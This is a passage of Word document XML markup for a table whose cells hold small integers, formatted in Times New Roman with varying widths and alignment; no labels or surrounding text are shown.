            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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auto"/>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19</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0" w:lineRule="atLeast"/>
              <w:ind w:left="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>5</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28</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80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>18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25</w:t>
            </w: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18</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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11</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25</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19</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4</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7</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3"/>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18</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6</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25</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19</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18</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20</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14</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32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18</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340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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10</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ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>33</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18</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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auto"/>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33</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28</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auto"/>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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>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228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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228" w:lineRule="exact"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>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25</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15</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23</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20" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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40" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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14</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="20"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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11</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="80"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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228" w:lineRule="exact"/>
              <w:ind w:right="40"/>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auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:right="40"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>23</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19</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32</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25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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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33</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29</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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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25</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="420" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>14</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>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18</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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>30</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25</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11</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33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>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gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="300" w:type="dxa"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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0" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>8</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500" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="180"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>14</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25</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20</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14</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25</w:t>
            </w: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6</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="40"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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24</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0" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:left="80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="79"/>
              </w:rPr>
              <w:t>5</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4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8</w:t>
            </w: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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="38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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>18</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>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25</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23</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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="100"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="0" w:lineRule="atLeast"/>
              <w:ind w:right="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>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6</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5</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80"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>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340" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="42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gridSpan w:val="3"/>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ind w:right="180"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>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19</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4</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8</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28</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33</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auto"/>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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="160"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
            <w:pPr>
              <w:spacing w:line="228" w:lineRule="exact"/>
              <w:ind w:left="140"/>
              <w:rPr>
